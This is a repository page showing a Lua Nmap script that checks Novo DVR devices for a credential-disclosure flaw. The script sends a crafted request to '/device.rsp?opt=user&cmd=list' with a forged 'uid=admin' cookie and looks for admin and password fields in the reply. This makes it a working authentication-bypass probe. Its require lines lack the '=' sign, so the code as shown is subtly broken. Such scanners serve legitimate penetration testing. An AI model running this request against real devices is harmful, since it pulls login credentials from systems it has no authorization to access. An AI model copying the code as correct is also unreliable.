github
/
PenetrationTestingScripts
mirror of https://github.com/ym2011/PenetrationTestingScripts
1
0
Fork 0
Code Issues Projects Releases Wiki Activity
PenetrationTestingScripts/nmap_scripts/Novo-credentials_disclosure...

35 lines
986 B
Lua
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

local http require "http"
local string require "string"
local stdnse require "stdnse"
local shortport require "shortport"
description = [[
Desc:Novo DVR存在凭证泄露问题
攻击者精心构造链接,
修改cookie信息即可查看返回的登录凭证信息。
]]
author = "seaung"
portrule = shortport.http
action = function(host, port)
local url = "/device.rsp?opt=user&cmd=list"
local output = stdnse.output_table()
local options = {headers={}}
options["headers"]["cookie"] = "uid=admin"
local response = http.get(host, port, url, options)
if response.status == 200 then
if string.find(response.body, "admin") ~= nil and string.find(response.body, "pwd") ~= nil then
stdnse.debug1("[+] found vulnerable.")
output = "[+] Found vulnerable."
else
stdnse.debug1("[-] not found vulnerable.")
output = "[-] Not Found vulnerable."
end
end
return output
end
Reference in New Issue View Git Blame Copy Permalink